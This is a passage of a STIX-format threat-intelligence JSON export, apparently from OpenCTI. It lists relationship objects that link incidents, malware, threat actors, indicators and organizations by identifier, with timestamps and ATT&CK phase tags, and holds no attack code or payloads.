"x_opencti_role_played": "Unknown",
"x_opencti_id": "e029aeac-8880-4a58-bb86-5b4ed217a5db",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7ae37c11-aa56-4155-99c6-72e0aecff7ea",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:41:04.644Z",
"modified": "2020-02-04T15:41:04.644Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2eb3c5a2-a0d2-4540-8107-b61c90e0dd2e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--958d972f-186c-4bc0-b1b4-453c0d4dc8b1",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:44:07.399Z",
"modified": "2020-02-04T15:44:07.399Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5b686f15-7d54-43f8-8b0a-9b1281b3269c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--22bc2200-846f-4552-ad7f-8993489eabfe",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"target_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"x_opencti_source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"x_opencti_target_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"created": "2020-02-04T15:48:06.664Z",
"modified": "2020-02-04T15:48:06.664Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7b123d30-b3d6-49d3-ae3d-8f2d81ed3795",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--e834fc63-5daf-468e-bf2d-4cfc1c15c745",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"created": "2020-02-04T16:07:16.026Z",
"modified": "2020-02-04T16:07:16.026Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-11-17T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0621c2e5-dce2-4aa2-8a6e-e8d5f5d3c063",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--33e2068b-067d-480c-be0e-4f2e71645f85",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:23.182Z",
"modified": "2020-02-05T10:05:23.182Z",
"x_opencti_first_seen": "2020-02-05T10:05:23.182Z",
"x_opencti_last_seen": "2020-02-05T10:05:23.182Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4a6144a1-2445-42fd-a6ee-8d15e889f96d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--4819490a-9414-4b8d-8208-87dc2a33f584",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:34.829Z",
"modified": "2020-02-05T10:05:34.829Z",
"x_opencti_first_seen": "2020-02-05T10:05:34.829Z",
"x_opencti_last_seen": "2020-02-05T10:05:34.829Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f3b3e5d6-9527-46b5-88af-4b8047140b1c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--14e23cd7-1a6d-422e-b1a6-61cb53e01215",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:26.060Z",
"modified": "2020-02-05T10:06:26.060Z",
"x_opencti_first_seen": "2020-02-05T10:06:26.060Z",
"x_opencti_last_seen": "2020-02-05T10:06:26.060Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6bb2c634-161d-4660-8c0b-4a2485bcc899",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
}
]
}